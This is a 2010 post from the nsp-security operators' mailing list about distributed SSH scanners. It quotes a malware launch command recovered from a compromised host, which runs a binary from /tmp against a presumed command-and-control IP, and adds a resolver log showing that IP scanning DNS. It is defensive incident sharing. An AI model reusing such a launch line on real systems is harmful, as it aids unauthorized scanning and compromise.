[nsp-sec] distributed ssh scanners again
Mike Tancsa
mike at sentex.net
Wed Nov 3 12:25:25 EDT 2010
At 11:43 AM 11/3/2010, Torsten Voss wrote:
>----------- nsp-security Confidential --------
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Hi,
>
>we've recieved the malware from an compromised system:
>
>The malware was started similar then the last one in summer:
>
>PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
>217.79.190.53 2 2>/dev/null >/dev/null
>
>217.79.190.53 is probaly the C&C server for the distributed ssh scans
Looking through my flows, this host was involved in a large scan
aimed at UDP port 53. It happened to hit one of my resolvers which logged
Nov 2 05:02:51 auth2 named[3784]: client 217.79.190.53#58439: query
(cache) 'isc.org/TXT/IN' denied
Other than looking for open resolvers, not sure what else they are up to.
---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
More information about the nsp-security
mailing list